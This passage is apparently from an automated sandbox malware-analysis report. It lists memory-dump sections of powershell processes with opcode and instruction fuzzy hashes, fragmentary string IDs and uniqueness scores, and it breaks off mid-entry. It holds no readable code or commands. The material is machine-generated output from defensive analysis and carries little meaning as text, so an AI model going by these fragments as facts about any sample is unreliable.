                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0oAp$0oAp$0oAp$`Q^q$$^q$$^q$$^q
                                        • API String ID: 0-1375766648
                                        • Opcode ID: 25a2eeefd5fa4bdf840350c071fcb65e89da1a7537888437fc1977261ab15b92
                                        • Instruction ID: 77eeef2586e81e3ed2a144368b8754a0afcfbbd999703fabc57b34932126e953
                                        • Opcode Fuzzy Hash: 25a2eeefd5fa4bdf840350c071fcb65e89da1a7537888437fc1977261ab15b92
                                        • Instruction Fuzzy Hash: FBE1E1307501108FDF289B79891466E76D7AFC8B10B2448ABD902DF3A5EE75EC4B8792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dn^$dn^$dn^$dn^$dn^
                                        • API String ID: 0-1021356010
                                        • Opcode ID: 6cbc13651e4dd8cf1452be5c746dda4ed506c54f4c837fe61703d4753c3a3c91
                                        • Instruction ID: c819b9c860a6f5527bb559c3556262d5cca5a47d90e1848d0565c5b6bdadc129
                                        • Opcode Fuzzy Hash: 6cbc13651e4dd8cf1452be5c746dda4ed506c54f4c837fe61703d4753c3a3c91
                                        • Instruction Fuzzy Hash: 8D413A2560E3C18FC7079B3C99A44957FB5AF572A471A41DBD1C4CF2B7D9289C0AC3A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dn^$dn^$dn^$dn^$dn^
                                        • API String ID: 0-1021356010
                                        • Opcode ID: 4f2a4b4731d30df94406e33b8007cff0a75180096e4fa33ceb30ff461627cd26
                                        • Instruction ID: 6171ab6592dff42f85717e252c0bfe147ad44cc65990b2ac4996c113beb4b58d
                                        • Opcode Fuzzy Hash: 4f2a4b4731d30df94406e33b8007cff0a75180096e4fa33ceb30ff461627cd26
                                        • Instruction Fuzzy Hash: F631B22650E3C18FC30B9B7998A80C97F75AE631A470E81EBC1C4CF0A3D8591C4AC3A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$xl$xl
                                        • API String ID: 0-2883722390
                                        • Opcode ID: 00bfb5002f6e12f283613debae1e859f9ce862812e3dcdc15ce05b79a0ced05e
                                        • Instruction ID: 36dff2d7ad3618c223c9dcfebf80a221e6af84c77c744c327d27aedd38e8b55c
                                        • Opcode Fuzzy Hash: 00bfb5002f6e12f283613debae1e859f9ce862812e3dcdc15ce05b79a0ced05e
                                        • Instruction Fuzzy Hash: F611E97570430A9FEB68591A9A04B3BFFEEAFC1B20F24C62BE4558B354CA32C445C751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: fc1fe56dd75f1f7bbb0c4dafbef5dbdcae9077fd059b81bfc7334dc910e7d954
                                        • Instruction ID: 23cf96043bc078ea1a660dd1242adf6dfb107fb3c87ddbcc81b555d2ba11a6cd
                                        • Opcode Fuzzy Hash: fc1fe56dd75f1f7bbb0c4dafbef5dbdcae9077fd059b81bfc7334dc910e7d954
                                        • Instruction Fuzzy Hash: EFB19574E012099FDB55DFA9D580A9EFBF1FF88300F10862AE819AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: db746c9a85db89e746d0dd9d4cf297672d832b91e28b9bb222b30795c21a4a5c
                                        • Instruction ID: 5a215cd7d6c7c7bdba9e72276a0f1902b4efcf4fdfae25194c0f8c8259aa7262
                                        • Opcode Fuzzy Hash: db746c9a85db89e746d0dd9d4cf297672d832b91e28b9bb222b30795c21a4a5c
                                        • Instruction Fuzzy Hash: 28B19674E002099FDB55DFA9D580A9EFBF1FF88304F10862AE819AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: bbf9e66800786b03aca334bdd72d36d12e3cb4de037a0a995cc79f0d7100075d
                                        • Instruction ID: fc5bdeb91bec27eda121ed6712011af4afafacbaf0e97a36583759cda5e30550
                                        • Opcode Fuzzy Hash: bbf9e66800786b03aca334bdd72d36d12e3cb4de037a0a995cc79f0d7100075d
                                        • Instruction Fuzzy Hash: 592199B230030A9FDBB4592A9D00B2BB7DE6BC1718F248D3AE445DF390DD75C8518361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: f05770754b1167350723718ec2533e5407fe4284b42d13556eda8983ce0275fc
                                        • Instruction ID: ca89a9a00fd5b9f002bb2d060aff87060af470f03c9fb9cf8d59437dcdddf555
                                        • Opcode Fuzzy Hash: f05770754b1167350723718ec2533e5407fe4284b42d13556eda8983ce0275fc
                                        • Instruction Fuzzy Hash: 39F0EC71B4121A4FC77D157C251413E91DF5BC0A517388A2ED0129F348CEB2CD8A43D7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$xl$xl
                                        • API String ID: 0-1406044387
                                        • Opcode ID: c6235d2dc94289d6c861fd3fbc53b56f31562ad9194d112218550575e40fd19b
                                        • Instruction ID: 4f370f2e11789f53a5a23efbbf048ea6e0000a9dfd864f0434abf7752cdc4acd
                                        • Opcode Fuzzy Hash: c6235d2dc94289d6c861fd3fbc53b56f31562ad9194d112218550575e40fd19b
                                        • Instruction Fuzzy Hash: 53821AB17042059FCB298F78C96866BBBA2BF85310F1484AAD546CF3D1DB35D885C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7258b314104a688ef979aef143d1939b643ee9e5aa5dfdbf7790846aac9b9da
                                        • Instruction ID: 1d707e7fcb143118ad0c8a52a0f9ca5b20e76811435503e360ba6ecdf221ff4c
                                        • Opcode Fuzzy Hash: b7258b314104a688ef979aef143d1939b643ee9e5aa5dfdbf7790846aac9b9da
                                        • Instruction Fuzzy Hash: 95C1C172A043544FDB1AEFB489215AEBBF2EF81310B04856ED049AF352DF345D0ACB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3743502a38260e8bf40c309cd930392936513103ad24001af30fb5dd4ecc6d39
                                        • Instruction ID: 75782c91f20c50149e07f074496c3cc0a414699c4df781036bc142eb21f42d72
                                        • Opcode Fuzzy Hash: 3743502a38260e8bf40c309cd930392936513103ad24001af30fb5dd4ecc6d39
                                        • Instruction Fuzzy Hash: BE919172B006145BCB19EFB5C9156AFB7E2EFC4704B10892DD14AAB340DF746E0A8BD6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: 5a361bcba8de016df45caffda4bac2006aa4a6c32ffcfae8cb77eff6f8c9e21e
                                        • Instruction ID: e8a57e0576f77332b92b3dbfe5c3b6aec9531127a07751f06c58c85fc2565d50
                                        • Opcode Fuzzy Hash: 5a361bcba8de016df45caffda4bac2006aa4a6c32ffcfae8cb77eff6f8c9e21e
                                        • Instruction Fuzzy Hash: 0F31E0323042004FC715AB79E86196EBBEAEBC1321714853ED10A8B355DF329C0687A5
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: </wl
                                        • API String ID: 0-2362596250
                                        • Opcode ID: ce83a3c0a11c4158f5b9c1b04fb984482831a038fcbaf0a59535205b2d571b7f
                                        • Instruction ID: 6536ecc2286850a7f9083bcc8bd240ad83b5534ed8516b940cd00dbaff8f1332
                                        • Opcode Fuzzy Hash: ce83a3c0a11c4158f5b9c1b04fb984482831a038fcbaf0a59535205b2d571b7f
                                        • Instruction Fuzzy Hash: B83106317002059FCB21CF69D950AAABFF5EF89320F04846EE195CB362D771D905DB91
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q
                                        • API String ID: 0-2067289071
                                        • Opcode ID: a61be03dd1ea48f55d784fdb5012f7260e7aece49a0ce2dff1d748f13fa28f61
                                        • Instruction ID: 4200bd8e5f6e49ec122c187bf4bf59f3e4d93d937b250650da93c64ae1356ff7
                                        • Opcode Fuzzy Hash: a61be03dd1ea48f55d784fdb5012f7260e7aece49a0ce2dff1d748f13fa28f61
                                        • Instruction Fuzzy Hash: 3F21E071E002588FCB14DFAED404B9EBFF5EB89320F24846AD448E7350CB399801CBA5
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: </wl
                                        • API String ID: 0-2362596250
                                        • Opcode ID: 99a024b99bdd1851b573ed51cbec866eb3e18121443f3e84bc3ccacbb2e94b5a
                                        • Instruction ID: 4b3b9bbc5b67a198b3a95d13b9f1146e98129b988e7e034abcf873684ff99c5f
                                        • Opcode Fuzzy Hash: 99a024b99bdd1851b573ed51cbec866eb3e18121443f3e84bc3ccacbb2e94b5a
                                        • Instruction Fuzzy Hash: 5821A131B002059FCB20CF6AD945BAABBE6EF88320F14C429E559CB365DB71E945DB90
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: abbcb92acd277a96696a90da171431542a2cbfa2cf4e0d2cfd56c510305fae9e
                                        • Instruction ID: fe61f163dceffbaeb90fc18c7eebc0606a16df9c68ea00131a4f1864fcc4060d
                                        • Opcode Fuzzy Hash: abbcb92acd277a96696a90da171431542a2cbfa2cf4e0d2cfd56c510305fae9e
                                        • Instruction Fuzzy Hash: 5661F371E012088FCB14DFA9D594B9DBBF5EF88320F24812AE909AB265DB349D45CB60
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 827080a75f38466940fc81849750311353d5827519e8de36c0351114a7a01b0d
                                        • Instruction ID: 49f015616baf3ae58e02ab74507c32785844f1b922a6188d126abbed8c18ddf6
                                        • Opcode Fuzzy Hash: 827080a75f38466940fc81849750311353d5827519e8de36c0351114a7a01b0d
                                        • Instruction Fuzzy Hash: 4A511471E01248DFCB04DFA9D594B9DBBF5EF88320F24806AE909AB365DB349C45CB50
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c56b85f0d84e134d6c180717929bc0792881c5ff29a3efb504b58da4c7767c5
                                        • Instruction ID: 83097bbc5e79da5c201da0465e5f8c1d3634c54714e4a28c0b62f2bff5f56c0e
                                        • Opcode Fuzzy Hash: 6c56b85f0d84e134d6c180717929bc0792881c5ff29a3efb504b58da4c7767c5
                                        • Instruction Fuzzy Hash: 3C51D371304315DFD718EB68D844B2A7BE6FF88325F158469E509CB356EB31EC018B90
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d2f475b23b35ecff5eed8776ff94a3ebe2b1831482f812fd8aaca033ed389f0
                                        • Instruction ID: c934ff755f72ef92ef81b62254d1207e5ce16ec556096e38744e155c51ee4e34
                                        • Opcode Fuzzy Hash: 1d2f475b23b35ecff5eed8776ff94a3ebe2b1831482f812fd8aaca033ed389f0
                                        • Instruction Fuzzy Hash: 91418074A043448FCB15DF65C898AAABBF1AF8D324F154099E441EB3A2CB31DC01DF61
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9747ee5155d734395e7f7d73e3fe97f6ec9dbb039c57da2e9b74e860e5f7c6a3
                                        • Instruction ID: 921294bb5ea5b210bf4495fa775e3312c61aeadd15992e5dd650460a6a705d4c
                                        • Opcode Fuzzy Hash: 9747ee5155d734395e7f7d73e3fe97f6ec9dbb039c57da2e9b74e860e5f7c6a3
                                        • Instruction Fuzzy Hash: C2310B75A042048FDB14DF65C598AAABBF2EF8D325F155098E406AB391DB31DC41DF60
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17c841177dc333fcd45152d7c61bebc0f0806e8daca4017352a99ed56458d92b
                                        • Instruction ID: e3c05f018cafa143ef111a3a4b66d2c78074da60ba744b0e5a054ff047474dac
                                        • Opcode Fuzzy Hash: 17c841177dc333fcd45152d7c61bebc0f0806e8daca4017352a99ed56458d92b
                                        • Instruction Fuzzy Hash: 6F219F753002018FC714EB7DE990A2E77D7EBC8335B198069E909CB359DE36CC069B91
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c61d9506399a3752bb2f02936969206ca247df80ceda79505204712c6413e17c
                                        • Instruction ID: 48c4694b4c16ad46b847a09daaf6361a600bc8af78f989a178bcf86d5644c837
                                        • Opcode Fuzzy Hash: c61d9506399a3752bb2f02936969206ca247df80ceda79505204712c6413e17c
                                        • Instruction Fuzzy Hash: 92318C30E002098FDB05DF7AD4947AEBBF6EF89360F249069E445EB351EB348C419B62
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3b0353782285d7d90778a6e357e90f449f56baac77de53ea88092e3d3da01c2
                                        • Instruction ID: 4709e3b1594279d47c73bb793ca261645c1fe75f9ca0b709db93d0af98591d4d
                                        • Opcode Fuzzy Hash: b3b0353782285d7d90778a6e357e90f449f56baac77de53ea88092e3d3da01c2
                                        • Instruction Fuzzy Hash: 3131A174A002059FDB04EFB4D855ABF7BF2EF84300F1194B8E504AB396DA399D428BA1
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc7a141a55472f3f1bb15b72bdd824dfed6d60c4e0f424a0c4ee96fff09a9e9d
                                        • Instruction ID: f497cff48cc9fa607a5207bd9f7edaab925e13a521e030144e2ec0fad4d4e365
                                        • Opcode Fuzzy Hash: bc7a141a55472f3f1bb15b72bdd824dfed6d60c4e0f424a0c4ee96fff09a9e9d
                                        • Instruction Fuzzy Hash: 0E314C70E002099FCB04DFAAD5947AEBBF6EF99360F249029E405EB350EF748C419B65
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42431d8f4b0016ed1e0a2a58c80531c94611e9f33da6ace40a4e91b7eea104d5
                                        • Instruction ID: 18e634dacaf1ef28d8f56429d6d636b71028c2609922a2053fe9f3c8630be420
                                        • Opcode Fuzzy Hash: 42431d8f4b0016ed1e0a2a58c80531c94611e9f33da6ace40a4e91b7eea104d5
                                        • Instruction Fuzzy Hash: A3317C74A002099FDB04EFB4D955ABFB7F3EF84300F119478E514AB396DA3A9D428B91
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe68f67f06321ccdd0704b6d201deae8d49046920c72aa8fcc55da27376ddcf7
                                        • Instruction ID: 6414f6ef167f70d5496fca6f3b55effbf0903df40645a8419d4252326c154874
                                        • Opcode Fuzzy Hash: fe68f67f06321ccdd0704b6d201deae8d49046920c72aa8fcc55da27376ddcf7
                                        • Instruction Fuzzy Hash: CC21BC71500240EFCB09DF54DA80F26BB66FB88318F24C5BDE9095A256C73BD857CB61
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6df5b4ca650c34a892284e53a585c0f96b6b56a446383bb33a66d5ee4fc54599
                                        • Instruction ID: 3c3624a02b963f6b0ecb7d6691de83e62a32d8f9bf12b7c34794e094fb394402
                                        • Opcode Fuzzy Hash: 6df5b4ca650c34a892284e53a585c0f96b6b56a446383bb33a66d5ee4fc54599
                                        • Instruction Fuzzy Hash: 6631A071D057449FEB60CF6AD08878AFBF2EF89320F28C05DD44DA7205C6B5A8818B54
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e9642eb06387d534b788db7aa184101f803a23046dc1363f548d797ff6f14c6
                                        • Instruction ID: 29a6b15e45c88710f29246a30fc18e6e24d31c43c94da8107d0b39588527999b
                                        • Opcode Fuzzy Hash: 8e9642eb06387d534b788db7aa184101f803a23046dc1363f548d797ff6f14c6
                                        • Instruction Fuzzy Hash: 97217E71D057449EEB60DF6AD08878AFBF2EB88324F28C01ED45DA7205C6B568818B54
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: acb5eb44424aa7bfb63221cfe9e95a55781f3dd728932bd9bfa9a6380d9d33fc
                                        • Instruction ID: d23e9868a2b6d4272a859e3bfa2d84a4a657583d69ee4b2f6b275003ee912a8a
                                        • Opcode Fuzzy Hash: acb5eb44424aa7bfb63221cfe9e95a55781f3dd728932bd9bfa9a6380d9d33fc
                                        • Instruction Fuzzy Hash: 5911E97245E7E04FD717AB3C98711D13FA09E5722571A40EBC0C48E2B7D658884AC76A
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction ID: 72a32d91737d2033d0a7fdbb9d9a7ba5b5a72f1ec31c3db91006443cae13b085
                                        • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction Fuzzy Hash: C0216A76504240DFCB0ACF50DAC4B16BF62FB58318F24C5ADD9094A256C33AD86ACB91
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c10b3fca64842a9c5caa447449d1361af2ae7a61c2f2055a22928a625e387dff
                                        • Instruction ID: 2ff535742e6d37869e45a9bcb50d8c6d18e703344396cb7467adb8d66ae1b59c
                                        • Opcode Fuzzy Hash: c10b3fca64842a9c5caa447449d1361af2ae7a61c2f2055a22928a625e387dff
                                        • Instruction Fuzzy Hash: 9A01C0316087849FC729CB35D4A4A5A7FE5EF45220F1484AEE58AC76A2DB34EC41C700
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7817d445951c7531d8f781c64c84c1eb7d5bdea17f37a2899954da1922e3eb2
                                        • Instruction ID: 0b1dab884f17dc85aa3c8131836a19c8ba8a42918d816b96cc12d27580f15085
                                        • Opcode Fuzzy Hash: d7817d445951c7531d8f781c64c84c1eb7d5bdea17f37a2899954da1922e3eb2
                                        • Instruction Fuzzy Hash: 9311F3342057508FC728DF79D08099ABBF6AF8921572089ADD48A8BBA0CB32F845CF50
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50f58f29b01cfd7b0d46441261f0d71c8dbd8d7a0c367f72da63fae786a836ac
                                        • Instruction ID: 07561aa71f51d3ef0cc0dabbfcd1941fc2b87ab4c11fcffb2ba99f9f0b9f35bc
                                        • Opcode Fuzzy Hash: 50f58f29b01cfd7b0d46441261f0d71c8dbd8d7a0c367f72da63fae786a836ac
                                        • Instruction Fuzzy Hash: 9C012D6200E3C09ED7128B258D94B52BFB4DF53224F1981DBD9889F1A3C26A5849C772
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6beb9dfe64812935b30b29dc0839a0d2b494eaca4655f988c4ddee67c1d3f05
                                        • Instruction ID: 439a04e0baffb8e95b45d9181295deee66b390b20c0039f7084cda392f76c941
